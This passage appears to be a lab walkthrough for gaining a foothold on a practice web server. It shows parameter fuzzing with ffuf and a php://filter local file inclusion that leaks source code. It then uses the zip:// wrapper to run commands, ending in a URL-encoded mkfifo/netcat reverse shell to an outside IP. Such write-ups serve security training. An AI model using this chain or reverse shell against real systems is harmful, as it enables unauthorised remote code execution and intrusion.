Foothold

$ echo test > pwned.txt

Turn on foxy proxy to capture the request

Definitely wasnt it lol

$ ffuf -u http://192.168.241.229/index.php?FUZZ=1 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --fs 3151

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.241.229/index.php?FUZZ=1
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 3151
________________________________________________

file                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
:: Progress: [6453/6453] :: Job [1/1] :: 813 req/sec :: Duration: [0:00:08] :: Errors: 0 ::

GET /index.php?file=php://filter/convert.base64-encode/resource=upload

Lets view the source code of upload.php

$ vi upload.b64
                                                                                                                                                                                              
$ cat upload.b64| base64 -d > upload.php

PHP ZIP:// wrapper for RCECyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis

uploads/upload_1725881785.zip

GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=id

GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.45.168+1337+>/tmp/f

Previous80 NextEnumeration

Last updated 9 months ago